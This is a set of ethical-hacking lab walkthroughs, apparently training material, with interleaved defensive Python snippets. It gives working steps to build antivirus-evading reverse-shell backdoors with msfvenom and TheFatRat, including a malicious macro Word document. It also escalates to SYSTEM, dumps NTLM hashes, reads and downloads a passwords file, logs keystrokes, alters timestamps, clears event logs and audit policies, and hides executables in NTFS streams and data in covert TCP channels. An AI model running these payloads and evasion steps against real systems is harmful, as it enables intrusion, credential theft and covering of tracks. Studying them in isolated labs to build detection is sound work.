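The same rule transfers to any SIEM that ingests Sysmon: match EventID 13 and TargetObject containing that key, and pair it with a following process-creation event for fodhelper.exe to cut false positives further.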

Now, the first thing to do is to check the current user ID of Meterpreter by issuing the getuid command. You will observe that the Meterpreter server is still running with normal user privileges.

getuid

meterpreter > getuid

Server username: DESKTOP-ICB2IQ4\dummy

At this stage, we shall re-issue the getsystem command with the -t 1 switch, in an attempt to elevate the privileges.

getsystem -t 1

meterpreter > getsystem -t 1
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

This time, the command has successfully escalated the user's privileges and returns a message stating "got system", as shown above.

Now, type getuid again.

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

The meterpreter session is now running with SYSTEM privileges (NT AUTHORITY\SYSTEM).

Let's try to obtain the hashes located in the SAM file of Windows 10 by typing:

run post/windows/gather/smart_hashdump


This time, Meterpreter successfully extracted the NTLM hashes and displayed them, as shown above. Thus, we have successfully escalated privileges by exploiting the Windows 10 machine's vulnerabilities.

You can now execute commands such as clearev, which clears the event logs remotely.

 

Hacking Windows with Malicious Office Document using TheFatRat

TheFatRat is an exploitation tool which compiles malware with a well-known payload; the compiled malware can then be executed on Linux, Windows, Mac and Android. TheFatRat provides an easy way to create backdoors and payloads which can bypass most anti-virus software.

Official Repository: https://github.com/Screetsec/TheFatRat

Objectives

  • How to use an Office document to exploit a Windows machine.

Requisites

  • Windows Server 2016/2012 virtual machine.
  • Kali Linux virtual machine.

Set up TheFatRat

TheFatRat provides an easy way to create backdoors and payloads which can bypass most anti-virus systems.

Setting up

  1. Go to your Kali machine and open the Terminal.
  2. Navigate to the /opt/ folder:
     cd /opt
  3. Clone the original GitHub repository of TheFatRat:
     git clone https://github.com/Screetsec/TheFatRat.git
  4. Change the folder permissions:
     chmod -R 755 /opt/TheFatRat/
  5. Go to the TheFatRat folder:
     cd TheFatRat/
  6. Execute the bash file (setup.sh) to begin the installation:
     ./setup.sh

An "Updating Kali Repo" xterm window will pop up as shown below:


Make a Backdoor File

After the installation is complete, in the Terminal, type fatrat and hit enter.

When FatRat launches, it starts by verifying the installed dependencies; you will get multiple prompts, just press Enter to continue.


On the FatRat menu, choose [06] Create Fud Backdoor 1000% with PwnWindws [Excelent] by typing 6.


The PwnWinds menu appears as shown above; choose [3] Create exe file with apache + Powershell (FUD 100%) by typing 3.


Set the LHOST IP to your Kali IP, LPORT to 4444 and the output name to payload, as shown above.

Next, choose [3] windows/meterpreter/reverse_tcp by typing 3.


If everything works, fatrat will generate a payload.exe file in /root/Fatrat_Generated/ as shown below:

Backdoor Saved To : /root/Fatrat_Generated/payload.exe

Make a Malicious Word File

Go back to the main menu by choosing [9] Back to menu.

On the main menu, choose [07] Create Backdoor For Office with Microsploit.


On the Microsploit menu, choose [2] The Microsoft Office Macro on Windows by typing 2.

The next configurations will be:

  1. LHOST IP: [Your Kali IP]
  2. LPORT: 4444
  3. Enter the base name for output files: EvilDoc
  4. Enter the message for the document body: you have been PWNED :)
  5. The next prompt will ask if you want to use a custom exe file as the backdoor. Choose y for yes.
  6. Specify the exact path to the payload.exe that you generated at the beginning of this lab: /root/Fatrat_Generated/payload.exe
  7. On the Payload Option, choose [3] windows/meterpreter/reverse_tcp by typing 3. Navigate to the output folder of FatRat and you will see the generated Word file.


Set Up a Listener

Open another Terminal window and launch metasploit by typing: msfconsole.

Select the multi/handler:
use multi/handler

Set the payload to meterpreter/reverse_tcp:
set payload windows/meterpreter/reverse_tcp

Set the LHOST to your Kali IP and LPORT to 4444:
set LHOST 10.0.2.42
set LPORT 4444

Type run to start the listener:
run

Share the Malicious Doc File

To share the malicious file with the Windows machine, copy the Doc file to the Apache folder. Open a new Terminal window and type:
cp /root/Fatrat_Generated/EvilDoc.docm /var/www/html/share/

Then, start the apache service:
service apache2 start

Open the Malicious doc

Switch to your Windows machine and open the browser.

Type the URL (based on your Kali IP):
http://10.0.2.42/share/

Then, download the malicious doc that you generated.


Open the downloads folder and click the MS Word file.

MS Word opens the file in Protected View. Click Enable Editing as shown below:


If you get the SECURITY WARNING because of the macros, click Enable Content.

Now switch back to Kali; if everything works, you will find a Meterpreter session open in the Metasploit terminal.


Now you can view the exploited system details and so on. Informally you can call this action 'profit' :)
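The Protected View and Enable Content prompts are the last line of defence; a mail or download gateway can catch the document earlier by looking inside it. The Python below is an added example, not from TheFatRat or this guide: an OOXML Word file is a zip archive, and a VBA project is stored as the part word/vbaProject.bin and declared in [Content_Types].xml, so both are checked regardless of the file extension. The sample documents are constructed in code, and the macro part is a placeholder, not real VBA.

```python
import io
import re
import zipfile

# An OOXML Word file (.docx/.docm) is a zip of XML "parts". Macros live in one
# binary part, word/vbaProject.bin, which is also declared in [Content_Types].xml.
# Inspecting the archive rather than trusting the extension catches a macro
# document that was renamed to .docx. The sample documents below are constructed.
VBA_PART = re.compile(r"^(word|xl|ppt)/vbaProject\.bin$", re.IGNORECASE)
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def inspect_office_file(data):
    """Report whether an OOXML byte string carries a VBA project."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"ooxml": False, "vba_parts": [], "vba_declared": False}
    names = archive.namelist()
    vba_parts = [n for n in names if VBA_PART.match(n)]
    declared = False
    if "[Content_Types].xml" in names:
        declared = VBA_CONTENT_TYPE in archive.read("[Content_Types].xml").decode("utf-8", "replace")
    return {"ooxml": "[Content_Types].xml" in names, "vba_parts": vba_parts, "vba_declared": declared}


def gateway_verdict(filename, data):
    """Decide what a mail or download gateway should do with the attachment."""
    info = inspect_office_file(data)
    if not info["ooxml"]:
        return "not-ooxml"
    if info["vba_parts"] or info["vba_declared"]:
        if filename.lower().endswith(".docx"):
            return "quarantine: VBA project inside a file named .docx (extension mismatch)"
        return "quarantine: VBA project present"
    return "allow"


def build_sample_document(with_macro):
    """Construct a minimal OOXML archive for the demo; the macro part is a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        entries = ['<Default Extension="xml" ContentType="application/xml"/>']
        if with_macro:
            entries.append(f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>')
            archive.writestr("word/vbaProject.bin",
                             b"\xd0\xcf\x11\xe0 constructed placeholder, not a real VBA project")
        archive.writestr("[Content_Types].xml",
                         '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                         + "".join(entries) + "</Types>")
        archive.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


if __name__ == "__main__":
    print(gateway_verdict("EvilDoc.docm", build_sample_document(True)))
    print(gateway_verdict("report.docx", build_sample_document(False)))
```

A real gateway would additionally parse the OLE stream inside vbaProject.bin to extract the macro source, but the presence check alone already stops the EvilDoc.docm produced in this lab before any user sees the Enable Content button.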

Hacking Windows using Metasploit / Meterpreter - Post-Exploitation

Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.

Backdoors

Backdoors are malicious files that contain a Trojan or other infectious application that can either halt the target machine's system or gain partial/complete control over it. Attackers build such backdoors in an attempt to gain remote access to victim machines. They send these backdoors through email, file-sharing web applications, shared network drives and the like, and entice users to execute them. Once a user executes such an application, an attacker can gain access to the affected machine and perform activities such as keylogging, sensitive data extraction, and so on.

Objectives

  • Learn to detect Trojan and backdoor attacks.
  • Create a server and test the network for attack.
  • Attack a network using a sample backdoor and monitor system activity.

Requisites

  • Kali Linux virtual machine
  • Windows 10 virtual machine (Target)

Before beginning this lab, create a file called passwords.txt on Windows 10 and write down some fake accounts like:

  1. paypal: bobby123 / qwerty123
  2. twitter: bobby_123 / password123
  3. (...)

Save the file on your Desktop or Downloads folder.

Note: Make sure to disable Windows SmartScreen and Windows Defender.

Prepare the Backdoor

1. Create the Backdoor.exe

Switch to the Kali Linux and open the Terminal window.

Type the command to create the payload:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.0.2.42 -f exe > /root/Desktop/Backdoor.exe

Make sure to put your Kali IP in LHOST. If it works, you will get the message below:

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes

2. Share the Backdoor.exe

Start the Apache services:
service apache2 start

If you don't have apache2 installed, type: apt-get install apache2

Copy Backdoor.exe to the /var/www/html/share/ folder, which is visible from the web:
cp /root/Desktop/Backdoor.exe /var/www/html/share/

3. Set up the Handler

Open a new Terminal window and start the Metasploit Framework:
msfconsole

To handle exploits launched outside the framework, select the exploit/multi/handler:
use exploit/multi/handler

Set the reverse TCP payload:
set payload windows/meterpreter/reverse_tcp

To view the payload configurations:
options

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

Set the LHOST to your Kali IP:
set LHOST 10.0.2.42

The LPORT is correct, as shown above (4444).

To start the handler in the background, type:
exploit -j -z

Download and Execute the Backdoor.exe

Switch to your Windows 10 virtual machine and launch the browser.

Type the URL (based on your Kali IP):
http://10.0.2.42/share/

Then, download the backdoor.exe

backdoor-file

Double-click on the application and accept the Warnings.

Now Switch back to the Kali.

meterpreter-backdoor

If everything works, you will have a Meterpreter session open in the Metasploit terminal.

Using Meterpreter

To display the target system information, such as computer name, OS and so on, type:

sysinfo

meterpreter > sysinfo

Computer        : DESKTOP-ICB2IQ4

OS : Windows 10 (10.0 Build 16299).

Architecture    : x64

System Language : en_US

Domain          : WORKGROUP

Logged On Users : 2

Meterpreter     : x86/windows

To view IP address, MAC address and so on, type:

ipconfig

meterpreter > ipconfig


Interface  1

============

Name         : Software Loopback Interface 1

Hardware MAC : 00:00:00:00:00:00

MTU          : 4294967295

IPv4 Address : 127.0.0.1

IPv4 Netmask : 255.0.0.0

IPv6 Address : ::1

IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  3

============

Name         : Intel(R) PRO/1000 MT Desktop Adapter

Hardware MAC : 08:00:27:f8:e8:ec

MTU          : 1500

IPv4 Address : 10.0.2.15

IPv4 Netmask : 255.255.255.0

IPv6 Address : fe80::b8c2:616d:b6a1:1f4e

IPv6 Netmask : ffff:ffff:ffff:ffff::

To get the user that the server is running as, type:

getuid

meterpreter > getuid

Server username: DESKTOP-ICB2IQ4\dummy

Go to the folder that contains the passwords.txt you created before, using the cd (change directory), ls (list) and pwd (print working directory) commands.

meterpreter > cd Desktop

meterpreter > ls

Listing: C:\Users\dummy\Desktop

===============================


Mode Size     Type  Last modified Name

---- ----     ----  ------------- ----

100777/rwxrwxrwx  6646896  fil   2018-12-19 16:48:13 -0500  ProxySwitcher.exe

100777/rwxrwxrwx  73802    fil   2018-12-18 15:45:13 -0500  T3st.exe

100666/rw-rw-rw-  282      fil   2018-12-13 14:38:05 -0500  desktop.ini

100666/rw-rw-rw-  173      fil   2018-12-20 12:28:02 -0500  passwords.txt.txt

After you find the file, use the cat command to read the contents of the text file:

meterpreter > cat passwords.txt.txt

amex: bobby12 / qwerty123

paypal: bobby_123 / password123

twitter: b0bby1337 / password123

reddit: b0bby1337 / password123

google: bobby_31337@gmail.com / password1337

The MACE Attributes (Modified-Accessed-Created-Entry)

While performing post-exploitation activities, a hacker tries to access files to read their contents. Upon doing so, the MACE attributes change immediately, which gives an indication to the file user/owner that someone has read or modified the information.

To leave no hint of these MACE attributes, use the timestomp command to change the attributes as you wish after accessing a file.

To view the MACE attributes of passwords.txt, type:

timestomp passwords.txt -v

This command displays the created time, accessed time, modified time, and entry modified time, as shown below:

meterpreter > timestomp passwords.txt.txt -v

[*] Showing MACE attributes for passwords.txt.txt

Modified      : 2018-12-20 12:29:25 -0500

Accessed      : 2018-12-20 12:28:02 -0500

Created       : 2018-12-20 12:28:02 -0500

Entry Modified: 2018-12-20 12:29:25 -0500

Download a File

download <filename>

meterpreter > download passwords.txt.txt

[*] Downloading: passwords.txt.txt -> passwords.txt.txt

[*] Downloaded 173.00 B of 173.00 B (100.0%): passwords.txt.txt -> passwords.txt.txt

[*] download   : passwords.txt.txt -> passwords.txt.txt

The downloaded file is stored in the Home folder by default.

Locating files with Search

The search command helps you locate files on the target machine. The command is capable of searching through the whole system or a specific folder.

search -f pagefile.sys

meterpreter > search -f pagefile.sys

Found 1 result...

    c:\pagefile.sys (1476395008 bytes)

Log all the Key strokes

To start capturing all keyboard input from the target system, type:

keyscan_start

meterpreter > keyscan_start

Starting the keystroke sniffer ...

Switch to the Windows 10, create a text file and type something:

quick-brown-fox

Switch back to the Kali Linux and dump the captured Keystrokes, by typing:

keyscan_dump

meterpreter > keyscan_dump

Dumping captured keystrokes...

<Shift><Shift><Shift><Shift>Fox.txt<CR>

<Shift>The quick brown fox jumps over the lazy hacker.<^S>

View the idle time

You can see the number of seconds for which the user has been idle on the remote system, by typing:

idletime

meterpreter > idletime

User has been idle for: 4 mins 31 secs

You may shut down the target machine after performing post exploitation, by typing:

shutdown

meterpreter > shutdown

Shutting down...

meterpreter >

[*] 10.0.2.15 - Meterpreter session 1 closed.  Reason: Died

Useful links:

  1. Metasploit Cheat Sheet - SANS
  2. Meterpreter Cheat Sheet
  3. Meterpreter Cheat Sheet 2
  4. Meterpreter Big guide
  5. Msfvenom Cheat Sheet

Hiding Files using NTFS streams

A stream consists of data associated with a main file or directory (known as the main unnamed stream). Each file and directory in NTFS can have multiple data streams that are generally hidden from the user.

https://docs.microsoft.com/en-us/sysinternals/downloads/streams

NTFS supersedes the FAT file system as the preferred file system for Microsoft Windows operating systems. NTFS has several improvements over FAT and HPFS (High Performance File System), such as improved support for metadata and the use of advanced data structures.

Objectives

  • How to hide files using NTFS streams.

Requirements

  • Windows 7, 8, 10 or Windows Server 2012, 2016.

Hiding Data using NTFS streams

Make sure the C:\ drive file system is NTFS. To check this, go to Computer, right-click C:\ and click Properties.

NFTS-Info-1

  1. Open Windows Explorer and create a new folder called trick inside the C: drive.
  2. Go to C:\windows\system32 and copy calc.exe to the trick folder.

Calc-copy

  3. Launch the command prompt as Administrator, and navigate to C:\trick.
    cd C:\trick
  4. Create a readme.txt file, type Hello World inside it and save the file.
    notepad readme.txt
  5. Go back to the command prompt and type dir to list the files in the current folder. Note the file size of readme.txt.

Readme-Size

  6. Now hide calc.exe inside readme.txt by typing:
    type c:\trick\calc.exe > c:\trick\readme.txt:calc.exe

ntfs-4

  7. Type dir again and note that the file size of readme.txt did not change.
  8. In C:\trick, delete calc.exe.

Execute the Hidden Application

  1. Create a symlink: mklink backdoor.exe readme.txt:calc.exe
  2. Execute the backdoor.exe by typing: backdoor.exe

ntfs-5

Attackers may hide malicious files from being visible to the legitimate users by using NTFS streams and execute them whenever required.


Hiding Data using Steganography

Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video.

Network steganography describes all the methods used for transmitting data over a network without it being detected. Several methods for hiding data in a network have been proposed, but the main drawback of most of them is that they do not offer a secondary layer of protection. An attacker can use steganography to transfer sensitive information out of the target system undetected.

Objectives

  • Use Steganography in Windows and Linux.
  • Using Snow steganography to hide files and data.
  • Hiding files using spaces and tabs.
  • Hide secret text messages in images using OpenStego.

Hiding Data using Snow (Windows)

Snow website: http://darkside.com.au/snow/index.html

Snow is used to conceal messages in ASCII text by appending whitespace to the end of the lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. And if the built-in encryption is used, the message cannot be read even if it is detected.

Snow exploits the steganographic nature of whitespace: locating trailing whitespace in text is like finding a polar bear in a snow storm. It uses the ICE encryption algorithm, so the name is thematically consistent.

ICE encryption: this algorithm is a 64-bit block cipher. Snow runs it in 1-bit cipher-feedback (CFB) mode, which is inefficient because a full 64-bit encryption is required for each bit of output.

  • Launch the command prompt and navigate to the Snow folder.

snow-01

  • Create a readme.txt inside the SNOW folder with a random message like: hello world!
  • Now go back to the command prompt and embed the secret information:
    snow -C -m "My sketchy wallet: 3FkenCiXpSLqD8L79intRNXUgjRoH9sjXy" -p "pa55" readme.txt readme2.txt

-m "message": the secret string.
-p "pa55": the password; you can type any password you like.
readme2.txt: the name of another file, which will be created automatically in the same location.

Now the data ("My sketchy wallet: 3FkenCiXpSLqD8L79intRNXUgjRoH9sjXy") is hidden inside the readme2.txt file with the contents of the readme.txt.

readme2.txt = readme.txt + "My sketchy wallet: 3FkenCiXpSLqD8L79intRNXUgjRoH9sjXy"

You can open both readme.txt and readme2.txt to check whether there are any differences besides the whitespace, as shown below:

whitespaces-difference

  1. To reveal the hidden contents, type:
    snow -C -p "pa55" readme2.txt

snow3
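Because Snow hides its payload entirely in trailing spaces and tabs, a defender can look for exactly that. The following is an added example (not part of the original lab and not Snow's own code) that scans a text for trailing-whitespace runs, flags the mixed tab/space pattern a whitespace encoder leaves behind, and neutralises the channel by stripping it; the sample texts are constructed here and do not use Snow's real bit encoding.

```python
import re

# Matches a run of spaces/tabs at the very end of a line.
TRAILING_WS = re.compile(r"[ \t]+$")


def trailing_whitespace_report(text):
    """Return (suspicious_line_numbers, total_trailing_chars, mixed_tab_space).

    A line is suspicious when it ends in spaces or tabs. Tabs mixed with
    spaces inside one trailing run is an extra signal: editors rarely leave
    that behind, while whitespace encoders use both symbols.
    """
    suspicious, total, mixed = [], 0, False
    for lineno, line in enumerate(text.split("\n"), start=1):
        match = TRAILING_WS.search(line)
        if not match:
            continue
        run = match.group(0)
        suspicious.append(lineno)
        total += len(run)
        if " " in run and "\t" in run:
            mixed = True
    return suspicious, total, mixed


def is_likely_whitespace_stego(text, min_lines=2, min_chars=16):
    """Heuristic verdict: several lines carry trailing whitespace and either
    the runs mix tabs and spaces or the total hidden capacity is large."""
    lines, total, mixed = trailing_whitespace_report(text)
    return len(lines) >= min_lines and (mixed or total >= min_chars)


def strip_channel(text):
    """Remove trailing spaces/tabs from every line. This destroys any
    whitespace-encoded payload while leaving the visible text intact,
    which is the cheapest mitigation for text passing a boundary."""
    return "\n".join(TRAILING_WS.sub("", line) for line in text.split("\n"))


# Constructed samples: the same cover text with and without a trailing
# tab/space pattern of the kind a whitespace encoder appends.
CLEAN = "hello world!\nsecond line\nthird line\n"
STEGO = "hello world!  \t \t\t \nsecond line\t  \t \nthird line\n"

if __name__ == "__main__":
    print(trailing_whitespace_report(STEGO))   # ([1, 2], 12, True)
    print(is_likely_whitespace_stego(CLEAN))   # False
    print(strip_channel(STEGO) == CLEAN)       # True
```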


Image Steganography using OpenStego (Windows)

OpenStego is a steganography tool that hides data inside images. OpenStego is a Java-based application and supports password-based encryption of the data for an additional layer of security. It uses the DES algorithm for data encryption, in conjunction with MD5 hashing to derive the DES key from the password provided.

OpenStego website: https://www.openstego.com/

  1. Install OpenStego and open the application.

OpenStego-1

  2. Click the ellipsis button next to Message File and select the text file in the OpenStego folder (this text file contains dummy sensitive information such as VISA and PIN numbers).

OpenSTego-2

  3. Next, click the second ellipsis button (Cover File) and select Island.jpg, which is also in the OpenStego folder.

OpenStego-3

  4. Click the third ellipsis button (Output Stego File), select the Desktop and provide the file name stego.
  5. Now, click Hide Data in the lower right corner.

OpenStego-5

Open the image file on your desktop, you will see only the image but not the contents of the message(text file) embedded in it, as shown below:

OpenStego-6

Obtain the Text file from the Image

  1. Go back to the OpenStego window and click the Extract Data button on the left.
  2. Click the first ellipsis button (Input Stego File) and select the image you generated on the Desktop; select your Output Folder with the next ellipsis button.

openstego7

  3. Click Extract Data in the lower right corner. This extracts the message file from the image.
  4. The file displays all the information contained in the document, as shown below:

openstego8


Using Quick Stego (Windows)

Quick Stego hides text in pictures so that only other users of Quick Stego can retrieve and read the hidden secret messages.

QuickStego website: http://quickcrypto.com/free-steganography-software.html

Hide the text inside the image

  1. Install Quick Stego.
  2. Launch the application.

QuickStego-0

  3. Click Open Image, under Picture, Image, Photo File.
  4. Select the image 02_nissan_gt-r_specv_opt.jpg inside the QuickStego folder.
  5. Next, click Open Text under Text File, as shown below:

QuickStego-1

  6. Select the text file.txt inside the QuickStego folder.
  7. The selected text is added to the text box next to the image, as shown below.

QuickStego-2

  8. Click Hide Text under Steganography.

QuickStego-3

  9. To save the image file (in which the text is hidden), click Save Image, under Picture, Image, Photo File.

The file is now saved as "stego". Though it looks like a normal image file, it has the text hidden in it, which can only be seen by opening it in Quick Stego.


Hiding Data using Steghide (Kali Linux)

Steghide is a steganography program that is able to hide data in various kinds of image and audio files. The colour (or, for audio, sample) frequencies are not changed, which makes the embedding resistant against first-order statistical tests.

Official repository: https://github.com/StefanoDeVuono/steghide

Installing Steghide is very simple in Kali Linux, because it is already available in the Kali Linux repository.

Run the following command:

sudo apt-get update
sudo apt-get install steghide

Hide Text in Image file

  1. Create a folder on your Desktop with an image file and a secret text file.

Kali-Steg-Files-0

  1. To hide the text in the image, navigate to the /Desktop/steg/ folder and type:
    steghide embed -cf black-cat.jpg -ef secret-text.txt

    -cf: cover file <filename>
    -ef: embedded file <filename>

Steg-Kali-command
This command will embed the file secret-text.txt in the cover file black-cat.jpg protected with a passphrase.

Extract text from the Image file

After you have embedded your secret data, the receiver has to use steghide in the following way:

  1. Extract the Data
    steghide extract -sf black-cat.jpg
    -sf: Stego file
  2. Enter the correct passphrase.

KaliStego-2
The contents of the original file secret-text.txt will be extracted from the stego file black-cat.jpg and saved in the current directory.

View Information of Embedded Data

If some file contains embedded data and you want to get some information about it before extracting it, type the command:

Embedded Data

Steghide will then try to extract the embedded data with that passphrase and – if it succeeds – print some information about it.


Honorable Mention

StegoSuite for Linux and Windows is a free and open source steganography tool written in Java.

https://stegosuite.org/

Covert Channels using Covert_TCP

This program manipulates the TCP/IP header to transfer a file one byte at a time to a destination host.

Networks use network access control permissions to permit or deny the traffic passing through them. Tunneling is used to bypass the access control rules of firewalls, IDS, IPS and web proxies that allow only certain traffic. Covert channels can be made by inserting data into unused fields of protocol headers. There are many unused or misused fields in TCP or IP over which data can be sent to bypass firewalls.

Covert_TCP

Covert_TCP manipulates the TCP/IP header of the data packets to send a file one byte at a time from any host to a destination. It can act as a server as well as a client and can be used to hide the transmitted data inside an IP header. This is useful when bypassing firewalls and sending data in legitimate-looking packets that contain no payload for sniffers to analyze.

Objectives

  • How to carry covert traffic inside of unused fields of TCP and IP headers.

Requisites

  • Windows Server 2016/2012 virtual machine.
  • Kali Linux virtual machine.
  • Ubuntu Linux virtual machine.

Make a Secret Message File

In the Kali Linux, launch a new Terminal window.

  1. Create a folder named send on your Desktop, and navigate into it:
    cd Desktop
    mkdir send
    cd send
  2. Create a text file called message.txt inside send folder containing the string: Secret Message!
    echo "Secret Message!" > message.txt

Compile covert_tcp

  1. Download the covert_tcp.c file on the send folder:
    wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c
  2. Compile the covert_tcp.c file:
    cc -o covert_tcp covert_tcp.c

covert-compile-1

Make a Receiving Destination

  1. Go to your Ubuntu and open a new Terminal window.
  2. Switch to super-user access: sudo su
  3. Start the tcpdump as shown below:
    tcpdump -nvvX port 8888 -i lo

tcp-dump-ubuntu-2

  1. Leave the tcpdump listener running and open another Terminal window or tab.
  2. Go to Desktop and create a folder named receive and navigate into it:
    cd Desktop
    mkdir receive
    cd receive
  3. Download the covert_tcp.c file on the receive folder:
    wget https://raw.githubusercontent.com/cudeso/security-tools/master/networktools/covert/covert_tcp.c
  4. Compile the covert_tcp.c file:
    cc -o covert_tcp covert_tcp.c

    Note: In case you got some errors about cc command, install the compiler: sudo apt install gcc

Setup a Listener

  1. Start the Listener [Dest=Ubuntu, Source=Kali]:
    ./covert_tcp -dest 10.0.2.46 -source 10.0.2.42 -source_port 9999 -dest_port 8888 -server -file /home/s4msepi0l/Desktop/receive/receive.txt

Ubuntu-tcplistener

Launch Wireshark on Kali

  • Go back to Kali and Launch the Wireshark.

wireshark-kali-1

  • Start the Wireshark capturing, double click on your primary network interface item:

wirehsark-capturing-kali-2

Start Sending the Secret Message

  • Minimize the Wireshark and open a new Terminal window on your Kali, navigate to the send folder.
  • Start sending the contents of the message.txt file over TCP:
    ./covert_tcp -dest 10.0.2.46 -source 10.0.2.42 -source_port 8888 -dest_port 9999 -file /root/Desktop/send/message.txt

sendsecretmessage


Covert_tcp starts sending the string one character at a time, as shown above.
If you switch to the terminal window in Ubuntu, you will see the message being received:

receivingsecretmessage

Analyze the Results

  1. On your Ubuntu machine, stop tcpdump by pressing Ctrl+C, as shown below:

tcpdump-stop

Tcpdump shows that no packets were captured in the network.

  1. Navigate to /Desktop/receive/ and double-click the receive.txt file to view its contents. You will see the full message saved in the file, as shown below:

secretmessage-kali

  1. Switch back to Kali and stop the packet capture in Wireshark by clicking the red button at the top left.
  2. Click the Apply a display filter field and type tcp to view only the TCP packets, as shown below:

apply-display-filter=tcp

If you examine the communication between Ubuntu and Kali (10.0.2.46 - 10.0.2.42), you will find each character of the message string being sent as an individual packet over the network, as shown in the screenshots below:

Covert_tcp writes each character of the string into an otherwise unused header field, one character per packet, so the message crosses the network without being detected.

Packet 1, string: S

tcp-1

Packet 2, string: e

tcp-2

Packet 3, string: c

tcp-3

Packet 4, string: r

tcp-4

(...) And so on until the entire message was completed.
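The defender's side of the lab above is to recognise this one-character-per-packet pattern in a capture such as the Wireshark one. The following is an added example, not covert_tcp's own code: it parses raw IPv4/TCP headers, groups payload-less SYN packets per source/destination pair, and decodes the IP Identification field. It assumes (a labelled assumption, matching the "unused header field" idea of the lab rather than covert_tcp's exact layout) that the sender places one ASCII character in that 16-bit field, either as the raw value or in its high byte; the packets are constructed inline so it runs offline, where a real check would read them from a pcap.

```python
import struct


def build_packet(src, dst, sport, dport, ip_id):
    """Construct a minimal IPv4 header + TCP SYN header (40 bytes, no payload).
    Checksums are left at zero: this is a constructed sample, not real traffic."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, 40, ip_id, 0, 64, 6, 0,
                         bytes(int(o) for o in src.split(".")),
                         bytes(int(o) for o in dst.split(".")))
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0,
                          5 << 4, 0x02, 8192, 0, 0)  # data offset 5, SYN flag
    return ip_hdr + tcp_hdr


def parse_packet(pkt):
    """Return (src, dst, ip_id, tcp_flags, payload_len) for an IPv4/TCP packet."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len, ip_id = struct.unpack("!HH", pkt[2:6])
    src = ".".join(str(b) for b in pkt[12:16])
    dst = ".".join(str(b) for b in pkt[16:20])
    tcp = pkt[ihl:]
    data_off = (tcp[12] >> 4) * 4
    flags = tcp[13]
    return src, dst, ip_id, flags, total_len - ihl - data_off


def id_to_char(ip_id):
    """Assumed encoding: the character sits in the low byte (high byte zero)
    or in the high byte (low byte zero). Anything else decodes to None."""
    hi, lo = ip_id >> 8, ip_id & 0xFF
    for cand in (lo if hi == 0 else None, hi if lo == 0 else None):
        if cand is not None and 32 <= cand < 127:
            return chr(cand)
    return None


def extract_covert_message(packets, min_chars=4):
    """Decode ID fields of empty SYN packets per (src, dst) flow.

    A flow is reported only when at least min_chars packets all decode to
    printable text, so ordinary SYN retries or OS-incremented IDs (which
    rarely keep one byte at zero) do not raise an alert."""
    flows = {}
    for pkt in packets:
        src, dst, ip_id, flags, plen = parse_packet(pkt)
        if flags & 0x02 and plen == 0:          # SYN with no payload
            flows.setdefault((src, dst), []).append(id_to_char(ip_id))
    return {flow: "".join(chars) for flow, chars in flows.items()
            if len(chars) >= min_chars and all(c is not None for c in chars)}


# Constructed capture: the lab's covert flow plus five benign SYNs whose
# ID fields look like a normal incrementing counter.
SECRET = "Secret Message!"
COVERT = [build_packet("10.0.2.42", "10.0.2.46", 8888, 9999, ord(c)) for c in SECRET]
NORMAL = [build_packet("10.0.2.15", "10.0.2.46", 51000 + i, 443, 0x4A21 + i)
          for i in range(5)]


def demo():
    return extract_covert_message(COVERT + NORMAL)


if __name__ == "__main__":
    print(demo())   # {('10.0.2.42', '10.0.2.46'): 'Secret Message!'}
```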

Viewing, Enabling and Clearing Audit Policies using Auditpol

Auditpol is a command in Windows Server 2016, 2012 and 2008, and is required for querying or configuring audit policy at the subcategory level.

Auditpol displays the current audit policy settings and provides functions to manipulate audit policies.

Microsoft Documentation: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol

Objectives

  • How to set the Audit Policies

Requisites

  • Windows Server 2016/2012 virtual machine.

Syntax

Command        Description
/set           Sets the audit policy.
/get           Displays the current audit policy.
/backup        Saves the audit policy to a file.
/list          Displays selectable policy elements.
/restore       Restores the audit policy from a file that was previously created by using auditpol /backup.
/remove        Removes all per-user audit policy settings and disables all system audit policy settings.
/clear         Clears the audit policy.
/resourceSACL  Configures global resource system access control lists (SACLs).

To view all the audit policies:

Launch Command Prompt from the Windows Server and type:
auditpol /get /category:*

auditpol-category

To enable the audit policies, type:
auditpol /set /category:"system", "account logon" /success:enable /failure:enable

auditpol-enable

To check whether the audit policies are enabled, type:
auditpol /get /category:*

auditpol-success-failure

To clear the audit policies, type:
auditpol /clear /y

auditclear

To check whether the audit policies were cleared, type:
auditpol /get /category:*

audit-check-clear


User System Monitoring and Surveillance using Spytech SpyAgent

spyagent

Spytech SpyAgent is a powerful computer spy software that allows you to monitor everything users do on a computer in total stealth. SpyAgent provides a large array of essential computer monitoring features, such as website, application, and chat-client blocking, lockdown scheduling, and remote delivery of logs via email or FTP.

https://www.spytech-web.com/spyagent.shtml
[Trial/Paid]

Web Activity Monitoring and Recording using Power Spy

powerSpy

Power Spy software allows you to secretly monitor and record all activities on your computer, which is completely legal.

http://ematrixsoft.com/power-spy-software.php
[Trial/Paid]